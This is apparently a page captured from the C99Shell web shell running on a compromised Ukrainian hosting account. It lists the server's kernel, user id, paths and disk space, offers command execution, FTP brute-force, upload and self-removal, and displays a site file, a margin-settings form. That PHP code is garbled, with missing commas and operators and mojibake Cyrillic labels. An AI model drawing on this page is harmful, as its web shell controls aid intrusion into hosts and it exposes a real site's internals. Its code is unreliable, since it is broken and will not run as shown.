!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/inet-tech.org.ua/diplom/   drwxr-xr-x
Free 106.87 GB of 200.55 GB (53.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     page.php (1.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? if ($_SERVER['REQUEST_METHOD'] == 'POST')
{
    
$a = array();
    
$a[] = round($_POST['top'] / 0.3514598035146,2).'pt';
    
$a[] = round($_POST['right'] / 0.3514598035146,2).'pt';
    
$a[] = round($_POST['bottom'] / 0.3514598035146,2).'pt';
    
$a[] = round($_POST['left'] / 0.3514598035146,2).'pt';
    
file_put_contents("params.dat"implode(' ',$a));
}
    
$str file_get_contents("params.dat");
    
$str explode(' ',$str);
    for(
$i 0$i 4$i++)
        
$str[$i] = round(((float)$str[$i]) * 0.3514598035146,2);

    
//
?>
<!doctype html>
<head>
    <meta http-equiv="Content-Type" content="text/html;">
</head>
<body>
<h1>³äñòóïè</h1>
<form method="post">
<p>˳âèé: <input type="text" name="left" value="<?=$str[3?>"/> ìì</p>
<p>Ïðàâèé: <input type="text" name="right" value="<?=$str[1?>"/> ìì</p>
<p>Âåðõí³é: <input type="text" name="top" value="<?=$str[0?>"/> ìì</p>
<p>Íèæí³é: <input type="text" name="bottom" value="<?=$str[2?>"/> ìì</p>
<p><button>Çáåðåãòè</button></p>
</form>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0393 ]--